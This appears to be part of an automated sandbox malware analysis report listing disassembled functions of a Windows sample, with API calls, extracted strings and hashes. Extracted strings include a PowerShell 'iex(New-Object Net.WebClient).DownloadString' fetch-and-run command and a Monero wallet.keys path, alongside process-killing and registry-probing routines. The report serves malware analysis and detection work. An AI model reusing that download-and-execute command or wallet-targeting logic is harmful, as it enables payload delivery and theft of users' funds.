                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                      • String ID: %s\%s
                                      • API String ID: 3896182533-4073750446
                                      • Opcode ID: 0636cbcb392d6e9f66e50cbadea6476eeb9defeff124b7dec101cef917c6cc9a
                                      • Instruction ID: c3dcd072f8669275b6dee332bd33430fe81648ce263484123a238f3009122e1a
                                      • Opcode Fuzzy Hash: 0636cbcb392d6e9f66e50cbadea6476eeb9defeff124b7dec101cef917c6cc9a
                                      • Instruction Fuzzy Hash: 9821EB75910218ABDB24DB54DC85FE9B3B8FB88704F1085D8E609A6280DF756A85CFA4
                                      Function 00A499A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A499C5
                                      • Process32First.KERNEL32(00A3A056,00000128), ref: 00A499D9
                                      • Process32Next.KERNEL32(00A3A056,00000128), ref: 00A499F2
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00A49A4E
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00A49A6C
                                      • CloseHandle.KERNEL32(00000000), ref: 00A49A79
                                      • CloseHandle.KERNEL32(00A3A056), ref: 00A49A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                      • String ID:
                                      • API String ID: 2696918072-0
                                      • Opcode ID: 841132d90e7908c4b61e2be1d4b8d561e3115b0a1c1954d2cfcbd7313dad113e
                                      • Instruction ID: 80bd9d39de883bf0ff157f96b92daf6220a17ef0937281a8a56e2fb3df2adb10
                                      • Opcode Fuzzy Hash: 841132d90e7908c4b61e2be1d4b8d561e3115b0a1c1954d2cfcbd7313dad113e
                                      • Instruction Fuzzy Hash: 85211D74900318DBDB21DFA1CC88BDEB7B9BB48300F0041D8E50DAA290C774AE85CF61
                                      Function 00A47820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47834
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A4783B
                                      • RegOpenKeyExA.ADVAPI32(80000002,0130B788,00000000,00020119,00000000), ref: 00A4786D
                                      • RegQueryValueExA.ADVAPI32(00000000,0131EA48,00000000,00000000,?,000000FF), ref: 00A4788E
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A47898
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: 7545d5536c246102fb4d9601b5a69f4d8d77025d455606f9a0a72b2d3edd7f91
                                      • Instruction ID: 148a5e3532ae38e1b6fc759bc0e6af3a6b761482e5d229eaa30f34cfe43b4644
                                      • Opcode Fuzzy Hash: 7545d5536c246102fb4d9601b5a69f4d8d77025d455606f9a0a72b2d3edd7f91
                                      • Instruction Fuzzy Hash: 2C01EC79E48305BBEB00DBE4DD49F6E7778AB48701F104098FA09EA391D770A9409B65
                                      Function 00A478B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A478C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A478CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,0130B788,00000000,00020119,00A47849), ref: 00A478EB
                                      • RegQueryValueExA.ADVAPI32(00A47849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00A4790A
                                      • RegCloseKey.ADVAPI32(00A47849), ref: 00A47914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: 660d0849bd31b0a9ad404cc842ee15058ea5bdfe65db7cecbfbb792ced3a313f
                                      • Instruction ID: f92b80ed8a35344c1648f3c8b5bb74a65fb8dfc33eb5dff42caa4036963ac67f
                                      • Opcode Fuzzy Hash: 660d0849bd31b0a9ad404cc842ee15058ea5bdfe65db7cecbfbb792ced3a313f
                                      • Instruction Fuzzy Hash: 3301F4B9E44309BBEB00DBE4DC49FAE7778EB44701F104594FA09EA381D7706A108BB1
                                      Function 00A3A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                      • LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 49c0c8d73720dba4beaef5b5419347d1d1580771ac4b95626546a590c6bf9c82
                                      • Instruction ID: 1debd90ce15a9f464aecea331517220109116ba7841254e0a449dc376100f3fe
                                      • Opcode Fuzzy Hash: 49c0c8d73720dba4beaef5b5419347d1d1580771ac4b95626546a590c6bf9c82
                                      • Instruction Fuzzy Hash: 9E31DAB4E00209EFDB14CFA4D885FAE77B5AB58304F108259F915AB390D774AA81CFA1
                                      Function 00A449D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,0131EB98), ref: 00A44A2B
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A44A51
                                      • lstrcat.KERNEL32(?,?), ref: 00A44A70
                                      • lstrcat.KERNEL32(?,?), ref: 00A44A84
                                      • lstrcat.KERNEL32(?,0130A6B8), ref: 00A44A97
                                      • lstrcat.KERNEL32(?,?), ref: 00A44AAB
                                      • lstrcat.KERNEL32(?,0131D8A0), ref: 00A44ABF
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A48F20: GetFileAttributesA.KERNEL32(00000000,?,00A31B94,?,?,00A5577C,?,?,00A50E22), ref: 00A48F2F
                                        • Part of subcall function 00A447C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00A447D0
                                        • Part of subcall function 00A447C0: RtlAllocateHeap.NTDLL(00000000), ref: 00A447D7
                                        • Part of subcall function 00A447C0: wsprintfA.USER32 ref: 00A447F6
                                        • Part of subcall function 00A447C0: FindFirstFileA.KERNEL32(?,?), ref: 00A4480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 7d0eaeeeff437c7b61b9ec22d812759802eebdccc52863d738e2338a17da2f2c
                                      • Instruction ID: 266f6bd5186fa5cab386d435cfac5c950be81bae7c5973e68aff9189b494e5b5
                                      • Opcode Fuzzy Hash: 7d0eaeeeff437c7b61b9ec22d812759802eebdccc52863d738e2338a17da2f2c
                                      • Instruction Fuzzy Hash: 6D3160B6900218ABDB14FBB0DD89FDD733CAB98700F404589B60996151EE74A7C9CBA4
                                      Function 00A42EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A42FD5
                                      Strings
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00A42F14
                                      • ')", xrefs: 00A42F03
                                      • <, xrefs: 00A42F89
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00A42F54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 500524a6d1cfccbfe68da3dd31ce4f775b2f74826d753129084f14094c51f030
                                      • Instruction ID: 93a5a92677234a3a36da78adfbb90ea043aeeb5f00606e9385cd2b2651dce3e0
                                      • Opcode Fuzzy Hash: 500524a6d1cfccbfe68da3dd31ce4f775b2f74826d753129084f14094c51f030
                                      • Instruction Fuzzy Hash: DC411C75D406089AEB14FFA0C9A2FEDBB79BFA4340F404558E40666192EF702A4ACF51
                                      Function 00A44300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(80000001,0131DBE0,00000000,00020119,?), ref: 00A44344
                                      • RegQueryValueExA.ADVAPI32(?,0131ED00,00000000,00000000,00000000,000000FF), ref: 00A44368
                                      • RegCloseKey.ADVAPI32(?), ref: 00A44372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A44397
                                      • lstrcat.KERNEL32(?,0131EE08), ref: 00A443AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValue
                                      • String ID:
                                      • API String ID: 690832082-0
                                      • Opcode ID: 47f3d1b16094e24a8ca81678872ece485fe3beac8ae665b5bce3c96df95d8823
                                      • Instruction ID: 25553fe76b64f4f327d56a3af01269ed02b6ad472dd2b8391df36438a8015ce8
                                      • Opcode Fuzzy Hash: 47f3d1b16094e24a8ca81678872ece485fe3beac8ae665b5bce3c96df95d8823
                                      • Instruction Fuzzy Hash: 294169B6D002086BDB14FBA0ED56FEE733DAB8C700F004558B71996181FA7596988BE1
                                      Function 00AACBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: 49ff5042f791a29a4ba82e24556f757cb624f6c7496983cf1d7a6330a49d2056
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: BA219272D00628AFFB229F55CD41A7F3A79EB83BB0F054116F8196B291C7304D518BA0
                                      Function 00A47F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A47FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A47FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,0130BBB0,00000000,00020119,?), ref: 00A47FEE
                                      • RegQueryValueExA.ADVAPI32(?,0131D9C0,00000000,00000000,000000FF,000000FF), ref: 00A4800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00A48022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
